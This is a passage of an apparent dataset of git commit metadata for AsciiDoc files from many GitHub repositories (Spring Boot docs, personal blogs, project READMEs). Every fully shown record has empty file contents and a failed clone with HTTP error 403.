,SaravananParthasarathy\/SPSDemo,philwebb\/spring-boot,zhanhb\/spring-boot,aahlenst\/spring-boot,michael-simons\/spring-boot,bclozel\/spring-boot,SaravananParthasarathy\/SPSDemo,drumonii\/spring-boot,royclarkson\/spring-boot,lenicliu\/spring-boot,htynkn\/spring-boot,eddumelendez\/spring-boot,jbovet\/spring-boot,neo4j-contrib\/spring-boot,tsachev\/spring-boot,tsachev\/spring-boot,afroje-reshma\/spring-boot-sample,dreis2211\/spring-boot,xiaoleiPENG\/my-project,sbcoba\/spring-boot,pvorb\/spring-boot,scottfrederick\/spring-boot,i007422\/jenkins2-course-spring-boot,bclozel\/spring-boot,NetoDevel\/spring-boot,thomasdarimont\/spring-boot,donhuvy\/spring-boot,donhuvy\/spring-boot,rweisleder\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,michael-simons\/spring-boot,mdeinum\/spring-boot,neo4j-contrib\/spring-boot,eddumelendez\/spring-boot,drumonii\/spring-boot,mosoft521\/spring-boot,NetoDevel\/spring-boot,xiaoleiPENG\/my-project,eddumelendez\/spring-boot,jbovet\/spring-boot,akmaharshi\/jenkins,linead\/spring-boot,candrews\/spring-boot,sebastiankirsch\/spring-boot,SaravananParthasarathy\/SPSDemo,pvorb\/spring-boot,drumonii\/spring-boot,Nowheresly\/spr
ing-boot,qerub\/spring-boot,donhuvy\/spring-boot,royclarkson\/spring-boot,bclozel\/spring-boot,kdvolder\/spring-boot,joshiste\/spring-boot,DeezCashews\/spring-boot,sbcoba\/spring-boot,bjornlindstrom\/spring-boot,mbogoevici\/spring-boot,zhanhb\/spring-boot,ptahchiev\/spring-boot,hello2009chen\/spring-boot,herau\/spring-boot,lenicliu\/spring-boot,ptahchiev\/spring-boot,izeye\/spring-boot,bjornlindstrom\/spring-boot,mosoft521\/spring-boot,tiarebalbi\/spring-boot,habuma\/spring-boot,dreis2211\/spring-boot,hqrt\/jenkins2-course-spring-boot,lexandro\/spring-boot,spring-projects\/spring-boot,javyzheng\/spring-boot,deki\/spring-boot,mbenson\/spring-boot,RichardCSantana\/spring-boot,tsachev\/spring-boot,Nowheresly\/spring-boot,philwebb\/spring-boot-concourse,tiarebalbi\/spring-boot,tsachev\/spring-boot,DeezCashews\/spring-boot,izeye\/spring-boot,sbcoba\/spring-boot,ihoneymon\/spring-boot,hello2009chen\/spring-boot,zhanhb\/spring-boot,isopov\/spring-boot,deki\/spring-boot,tiarebalbi\/spring-boot,yangdd1205\/spring-boot,candrews\/spring-boot,mbogoevici\/spring-boot,spring-projects\/spring-boot,vpavic\/spring-boot,joansmith\/spring-boot,aahlenst\/spring-boot,shangyi0102\/spring-boot,ilayaperumalg\/spring-boot,javyzheng\/spring-boot,jmnarloch\/spring-boot,donhuvy\/spring-boot,lenicliu\/spring-boot,vpavic\/spring-boot,minmay\/spring-boot,hqrt\/jenkins2-course-spring-boot,isopov\/spring-boot,nebhale\/spring-boot,ptahchiev\/spring-boot,philwebb\/spring-boot,qerub\/spring-boot,SaravananParthasarathy\/SPSDemo,aahlenst\/spring-boot,thomasdarimont\/spring-boot,royclarkson\/spring-boot,jbovet\/spring-boot,jvz\/spring-boot,scottfrederick\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,herau\/spring-boot,lburgazzoli\/spring-boot,spring-projects\/spring-boot,sebastiankirsch\/spring-boot,brettwooldridge\/spring-boot,ollie314\/spring-boot,thomasdarimont\/spring-boot,dreis2211\/spring-boot,olivergierke\/spring-boot,SaravananParthasarathy\/SPSDemo,felipeg48\/spring-boot,yhj630520\/spring-boot,rweisleder\/spring-boot,yhj630520\/spring-boot,yhj630520\/spring-boot,joshthornhill\/spring-boot,aahlenst\/spring-boot,nebhale\/spring-boot,jvz\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,nebhale\/spring-boot,spring-projects\/spring-boot,mbenson\/spring-boot,ihoneymon\/spring-boot,lucassaldanha\/spring-boot,wilkinsona\/spring-boot,linead\/spring-boot,ihoneymon\/spring-boot,drumonii\/spring-boot,sbcoba\/spring-boot,mosoft521\/spring-boot,michael-simons\/spring-boot,kamilszymanski\/spring-boot,rweisleder\/spring-boot,ihoneymon\/spring-boot,izeye\/spring-boot,vpavic\/spring-boot,vakninr\/spring-boot,lucassaldanha\/spring-boot,linead\/spring-boot,sebastiankirsch\/spring-boot,kamilszymanski\/spring-boot,hello2009chen\/spring-boot,deki\/spring-boot,Buzzardo\/spring-boot,kamilszymanski\/spring-boot,habuma\/spring-boot,bclozel\/spring-boot,bbrouwer\/spring-boot,felipeg48\/spring-boot,felipeg48\/spring-boot,zhanhb\/spring-boot,ilayaperumalg\/spring-boot,pvorb\/spring-boot,tsachev\/spring-boot,Nowheresly\/spring-boot,jayarampradhan\/spring-boot,RichardCSantana\/spring-boot,hqrt\/jenkins2-course-spring-boot,vakninr\/spring-boot,RichardCSantana\/spring-boot,i007422\/jenkins2-course-spring-boot,javyzheng\/spring-boot,mdeinum\/spring-boot,ihoneymon\/spring-boot,bijukunjummen\/spring-boot,qerub\/spring-boot,hqrt\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,philwebb\/spring-boot,candrews\/spring-boot,jbovet\/spring-boot,joshthornhill\/spring-boot,philwebb\/spring-boot,xiaoleiP
ENG\/my-project,scottfrederick\/spring-boot,jmnarloch\/spring-boot,bijukunjummen\/spring-boot,chrylis\/spring-boot,Nowheresly\/spring-boot,bijukunjummen\/spring-boot,shakuzen\/spring-boot,ollie314\/spring-boot,brettwooldridge\/spring-boot,jxblum\/spring-boot,wilkinsona\/spring-boot,yhj630520\/spring-boot,ilayaperumalg\/spring-boot,mdeinum\/spring-boot,felipeg48\/spring-boot,donhuvy\/spring-boot,hqrt\/jenkins2-course-spring-boot,drumonii\/spring-boot,bclozel\/spring-boot,vpavic\/spring-boot,pvorb\/spring-boot,htynkn\/spring-boot,bjornlindstrom\/spring-boot,philwebb\/spring-boot,neo4j-contrib\/spring-boot,linead\/spring-boot,Buzzardo\/spring-boot,jmnarloch\/spring-boot,ptahchiev\/spring-boot,xiaoleiPENG\/my-project,spring-projects\/spring-boot,bbrouwer\/spring-boot,neo4j-contrib\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3f202d63984325f8af59cf655d066b73678efb9a","subject":"Update 2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","message":"Update 2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","new_file":"_posts\/2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1d27fcced533fb5bbf9e781830842fdbbe6213f","subject":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddbd2e00f048563047da4303058fb667dae2a4a3","subject":"Add missing file changes","message":"Add missing file changes\n","repos":"mstahv\/framework,asashour\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework","old_file":"documentation\/articles\/UsingVaadinCDIWithJAASAuthentication.asciidoc","new_file":"documentation\/articles\/UsingVaadinCDIWithJAASAuthentication.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"97979577456b5f3c20cb9c0de9a1e3a9818272c1","subject":"Update contributing section","message":"Update contributing 
section\n","repos":"uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"ce228b20ac92bb06c848257e24a0d42be8d917be","subject":"Added gettext as a system dependence.","message":"Added gettext as a system dependence.","repos":"uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"970ad6adac43e24601679883af398bf66596f88f","subject":"Documented the prefixes of html ids","message":"Documented the prefixes of html ids\n","repos":"uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"0c0ef59b4a8e3c98a86fe8c6e1cd95711f00e4b2","subject":"Started a troubleshooting document","message":"Started a troubleshooting document\n","repos":"jdigger\/jgit-process","old_file":"docs\/troubleshooting.adoc","new_file":"docs\/troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jdigger\/jgit-process.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a9f162956245caa85c85655042bb18def1381e0","subject":"Update 2018-12-11-Der-Wissenschaft-ihre-Autorchen.adoc","message":"Update 2018-12-11-Der-Wissenschaft-ihre-Autorchen.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2018-12-11-Der-Wissenschaft-ihre-Autorchen.adoc","new_file":"_posts\/2018-12-11-Der-Wissenschaft-ihre-Autorchen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a40e40db1d9db2dd93deb892f191c1e31750a60","subject":"Update 2017-08-04-mecab.adoc","message":"Update 2017-08-04-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-04-mecab.adoc","new_file":"_posts\/2017-08-04-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be80bba85e4ca86a1e18ef5a6c0e3a44b2d8c514","subject":"y2b create post This Gadget Turns Sound Into Better Bubbles...","message":"y2b create post This Gadget Turns Sound Into Better Bubbles...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-16-This-Gadget-Turns-Sound-Into-Better-Bubbles.adoc","new_file":"_posts\/2017-08-16-This-Gadget-Turns-Sound-Into-Better-Bubbles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02435f102407e33c5dbf80589997660865e8c019","subject":"Minor grammar proofread","message":"Minor grammar proofread","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9ec3b267868c26c39e57522a2eaca3ea87afe29d","subject":"Update 2017-03-17-APIs-with-Python-Flask-and-Aiohttp.adoc","message":"Update 2017-03-17-APIs-with-Python-Flask-and-Aiohttp.adoc","repos":"rvegas\/rvegas.github.io,rvegas\/rvegas.github.io,rvegas\/rvegas.github.io","old_file":"_posts\/2017-03-17-APIs-with-Python-Flask-and-Aiohttp.adoc","new_file":"_posts\/2017-03-17-APIs-with-Python-Flask-and-Aiohttp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rvegas\/rvegas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6be33bf3f841857566349c5859b09d4f81d843f2","subject":"docs: Add 1.5.0 to prior release notes","message":"docs: Add 1.5.0 to prior release notes\n\nChange-Id: Idc6ac068161a3ead277b9c04170d80f88a55b405\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8722\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\nTested-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu","old_file":"docs\/prior_release_notes.adoc","new_file":"docs\/prior_release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"306b2247a1fe8557690a36a8021a7361ef150859","subject":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","message":"Update 
2015-09-30-Multithreading-and-Parallel-Programming.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6eb1bea6405daef49e1d9e41a13f07cc3ba36d5","subject":"Update 2018-03-13-Link-On-Line.adoc","message":"Update 2018-03-13-Link-On-Line.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-03-13-Link-On-Line.adoc","new_file":"_posts\/2018-03-13-Link-On-Line.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb029b61a3fab737456753975e6920b6d94e45b4","subject":"Update 2018-09-06-failure.adoc","message":"Update 2018-09-06-failure.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-09-06-failure.adoc","new_file":"_posts\/2018-09-06-failure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a17bd9c00c628dadf1e6e5eb16b890b026a98e8c","subject":"Fixed some asciidoc","message":"Fixed some asciidoc\n","repos":"netdava\/jbakery,netdava\/jbakery","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netdava\/jbakery.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b7c29914f2d386c7a1e928345582b661b5a7cdca","subject":"added cloud and container tidbits","message":"added cloud and container tidbits\n\nSigned-off-by: Dan Mack <f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"interests.adoc","new_file":"interests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4d566e32fabdb27343267ba18124ce0e2dd7011","subject":"Update 2016-01-12-.adoc","message":"Update 2016-01-12-.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-12-.adoc","new_file":"_posts\/2016-01-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83249edb7e33d460b6d2e2935988a14291004294","subject":"JavaScript release documentation","message":"JavaScript release 
documentation\n","repos":"canoo\/dolphin-platform,canoo\/dolphin-platform,canoo\/dolphin-platform","old_file":"documentation\/dolphin-platform-documentation\/src\/docs\/asciidoc\/release.adoc","new_file":"documentation\/dolphin-platform-documentation\/src\/docs\/asciidoc\/release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/canoo\/dolphin-platform.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"03ea53e2d0b6030e751d3841efa86ae5ed78fe16","subject":"Added README","message":"Added README\n","repos":"kalon33\/libfitbit,Br3nda\/libfitbit,openyou\/libfitbit","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kalon33\/libfitbit.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"9d5c66b0476fb93479a3bea6472b9629c1471ea5","subject":"Update code documentation","message":"Update code documentation\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"zsdoc\/zplugin.zsh.adoc","new_file":"zsdoc\/zplugin.zsh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b53c9fb3773dcc855a8299f8679f895efedfb1db","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59cec1533d3f0218feb803602ff81139807e0e97","subject":"Update 2017-04-14-First-things-first.adoc","message":"Update 2017-04-14-First-things-first.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-04-14-First-things-first.adoc","new_file":"_posts\/2017-04-14-First-things-first.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a3cb9e69a96d21de8cc79c8cbc2aeca2907ddcb","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c3b2ee9876da3cdd08b561553ef32970590eb11","subject":"add etiquette page","message":"add etiquette 
page\n","repos":"clojure\/clojure-site","old_file":"content\/community\/etiquette.adoc","new_file":"content\/community\/etiquette.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ec1434e88394b1477306163558b11625acd3d0cf","subject":"Update 2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","message":"Update 2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","new_file":"_posts\/2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e9563fcf63107e5000d5c1cada481991f2b9af9","subject":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","message":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2dabb66f9df0ed7b755ebf11af67ed657389c28e","subject":"Update 2015-09-24-Back-to-Basic.adoc","message":"Update 2015-09-24-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-24-Back-to-Basic.adoc","new_file":"_posts\/2015-09-24-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fed282f834408c4282a48829765005f98357c431","subject":"Update 2016-07-24-Report-attack-tracepcap.adoc","message":"Update 2016-07-24-Report-attack-tracepcap.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-07-24-Report-attack-tracepcap.adoc","new_file":"_posts\/2016-07-24-Report-attack-tracepcap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"149b6480851ffdb0d58dab32cd9df422c63dea04","subject":"Publish 2015-5-22-Package-Messages-FAILED-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","message":"Publish 
2015-5-22-Package-Messages-FAILED-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"2015-5-22-Package-Messages-FAILED-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","new_file":"2015-5-22-Package-Messages-FAILED-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2dadb72644346458a24a22d46ec94fc052b21fb","subject":"Update 2015-06-03-impression-of-HubPress-after-first-press.adoc","message":"Update 2015-06-03-impression-of-HubPress-after-first-press.adoc","repos":"vvani06\/hubpress-test,vvani06\/hubpress-test,vvani06\/hubpress-test","old_file":"_posts\/2015-06-03-impression-of-HubPress-after-first-press.adoc","new_file":"_posts\/2015-06-03-impression-of-HubPress-after-first-press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vvani06\/hubpress-test.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f08d0a7ceff955c097a086ae5b310ef2789ac5db","subject":"Update 2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","message":"Update 2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","new_file":"_posts\/2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b8553d98b39f262e5f4c42c34dbd70926f1cdc1","subject":"Update 2016-04-25-Microservice-with-a-Websocket-transport.adoc","message":"Update 2016-04-25-Microservice-with-a-Websocket-transport.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-04-25-Microservice-with-a-Websocket-transport.adoc","new_file":"_posts\/2016-04-25-Microservice-with-a-Websocket-transport.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a8112fd3c6dc90c1d47b5950ca0f800efaf52cb","subject":"y2b create post Unlock Any MacBook Without The Password","message":"y2b create post Unlock Any MacBook Without The 